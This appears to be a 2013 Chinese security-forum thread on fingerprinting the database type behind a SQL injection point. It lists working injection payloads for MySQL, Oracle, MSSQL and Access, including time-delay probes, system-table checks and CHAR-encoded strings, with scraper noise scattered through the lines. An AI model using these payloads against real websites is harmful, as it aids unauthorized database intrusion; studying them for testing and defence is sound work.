中国网络渗透测试联盟

标题: 一个注射点如何最快速确认是什么类型数据库 [打印本页]
作者: admin    时间: 2013-2-11 09:54
标题: 一个注射点如何最快速确认是什么类型数据库
一个注射点如何最快速确认是什么类型数据库$ u# V& h" G, m5 K5 p
xsser (十根阳具有长短!!) | 2013-02-05 12:36$ q+ S3 v% V2 E3 p- b' \
假设这么一个注射点:' ~7 V/ U) I, L1 W5 B0 P
show.html?id=2
" X% ?, p( `% v1 z( f' emysql:id=2 and version()>0
% w7 v! N- E/ C3 T' ~/ S1 woracle:id=2 and '1'||'1'='11) ?4 \1 V# `% x- [$ d
其他的欢迎补充, T% [4 n" l, N3 }- S5 k2 F
1#
% Y/ T1 U. A$ nupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 12:47
/ t1 I; J/ c* M2 ?$ zAccess:! y' N; }6 O, l$ K
aNd aSc(cHr(97))=972 P  Y0 t+ w, W  Z
and exists(select id from MSysAccessObjects)
" N3 `" U/ }" G8 g9 WSQL Server:
# k1 ~3 l) Q% Z- h" C0 y9 m' Jand exists(select id from sysobjects)" N+ Y- o( b5 ^0 e7 `6 T
and length(user)>0
. I* f# Z3 S* l) c3 N  NMySQL:
- m) _' f0 S6 B4 I8 T) mand length(user())>07 T6 D) F! i5 l' q
2#' T' o4 J, P0 g; r( V; G4 y) h
xsser (十根阳具有长短!!) | 2013-02-05 12:48
" e+ I% D& T# d; k  S@upload 如果这些都不是呢…/ E  }; s8 t2 F+ Y9 d9 \
3#1 N7 U. t9 I7 e9 c1 j( a$ t
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:03+ C- _  q4 n, b- [6 l
@xsser 不快速的,延时注入- h2 Q$ f6 f1 i+ x& h
不知道这样写对不对+ b6 l$ k4 \* Y5 c2 X2 w: m5 T
mssql:id=2 and IF(ascii(SUBSTRING('name',1,1))>0)waitfor delay'0:00:3'
8 R6 f$ B) Z5 ^0 R) }6 K  |# P: T4 Cmysql:id=2 and select benchmark(1e8,current_date());
# U2 d0 z8 m" [( u2 l5 J" ~4#1 u8 K+ E4 A7 ^* Q( n0 n
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:10
1 x1 U+ X2 l3 P" m# B* H' g/ j" q最快的貌似是看报错信息8 {! I1 X+ U, y/ Z" S
oracle error2 x) _, N( B+ P. W0 F# E
mssql error
9 c4 _' }, P! \$ G& |  j3 k% {mysql error
+ T$ k6 k. p( j5#! j; B: U; I6 U  ~
Nimda (你们都是坏银~) | 2013-02-05 13:14) P8 u, h$ k2 Z, n2 S
小菜献丑来一发 Oracle:id=2 and 0<>(select count(*) from dual)9 u1 X* x, ]* t- n/ u- A( m0 Q
6#" K1 i& L8 @: u3 I
upload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:21
, q* n0 i+ s" r7 z% S“/*”是MySQL中的注释符,返回错误说明该注入点不是MySQL,继续提交如下查询字符:; E+ B5 F8 R; T) N9 n, T
“–”是Oracle和MSSQL支持的注释符,如果返回正常,则说明为这两种数据库类型之一。继续提交如下查询字符:" @7 y% Z5 |! c" Z) [" E
“;”是子句查询标识符,Oracle不支持多行查询,因此如果返回错误,则说明很可能是Oracle数据库。4 x9 X. r6 z' H) H/ _, D8 D
7#8 l: k* C! Z, T: ]9 P
_Evil (HackEnd) | 2013-02-05 13:336 T! U. u$ G" F) W3 i" y( x5 m( k
PostgreSQL
- O7 P* ^& w9 Z  ], g( l1 N8#
+ R% T" q/ M) F# z( C# ~5 o! wupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 13:429 D8 N- Y. |. u0 f
切换编码 and 1=13 I+ A8 D/ r4 @- [7 p
oracle:
: V/ _8 U5 a- z! iCHR(97) || CHR(110) || CHR(100) || CHR(32) || CHR(49) || CHR(61) || CHR(49)# f  |' n' |" e$ [" _6 [1 u1 G( p+ q
mssql:0 I! }$ @8 r- L# O" }( \
CHAR(97) + CHAR(110) + CHAR(100) + CHAR(32) + CHAR(49) + CHAR(61) + CHAR(49)) k- X5 t% R- y4 r; k* a) k
mysql:
& l, F6 N. Q$ Z& G0 E! S% [CHAR(97, 110, 100, 32, 49, 61, 49)& L, s* I' ~# ?# r3 Q; _1 G
9#
( b3 ?8 A+ [* |+ W  P9 \xsser (十根阳具有长短!!) | 2013-02-05 14:31
" V4 n8 D7 u& u@upload 比较常见的数据库这些还是可以判断的,但是还有其他奇葩类型的呢?
/ ]+ l* `9 n! c5 }10#
8 L& p( S1 L! d( m2 U+ {# hupload (%bf%27%bf%27%bf%27%bf%27%) | 2013-02-05 14:46
8 U$ d. k0 K; G+ t: W. \" E@xsser 是奇葩数据库类型的么?& t/ X2 V) v* i7 I3 ]6 y# P
根据注入的原理,我们可以猜想,要成功的注入,必须使得注入后的一片和谐,那么使用该类数据库特性来判断,综上所述:
3 x8 J3 {+ `/ Q& e, i9 G/ F: Y2 k1.是否可以使用特定的函数来判断,该数据库特有的. e6 k3 \3 s* y6 a2 }
2.是否可以使用辅助的符号来判断,如注释符号、多语句查询符等等, C+ T; J/ {. h: J
3.是否可以编码查询
  @9 T* k2 \& M3 R6 y3 p- ]4.是否显可以利用错信息
* l* z& C; i3 e  k  U5 h5.是否存在数据库某些特性辅助判断
% I: i7 K8 N  g. N个人见解9 Q+ ~: N1 Q; P5 `/ E7 t2 R  n
11#- y' h' G5 @0 R& E, P, A
小胖子 (z7y壮士,来,干了这碗酒!) | 2013-02-05 14:55( m, H* `" y: }, Q% A  \
已收藏,mssql可以直接看到错误提示的吧~
) N9 |0 F7 o6 r5 \3 i9 H12#
6 q6 q& p6 D$ _1 c: W$ n9 i  f) pPasser_by | 2013-02-05 15:092 Q" V1 K) n. x8 R
曾被 @GaRY 面过我这题。。。紧张了。。后来回家sqlmap判断注射点的时候抓包看了下。。。一抓包全出来了居然。。, }$ Z: h3 Q, w
from:http://zone.wooyun.org/content/260



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2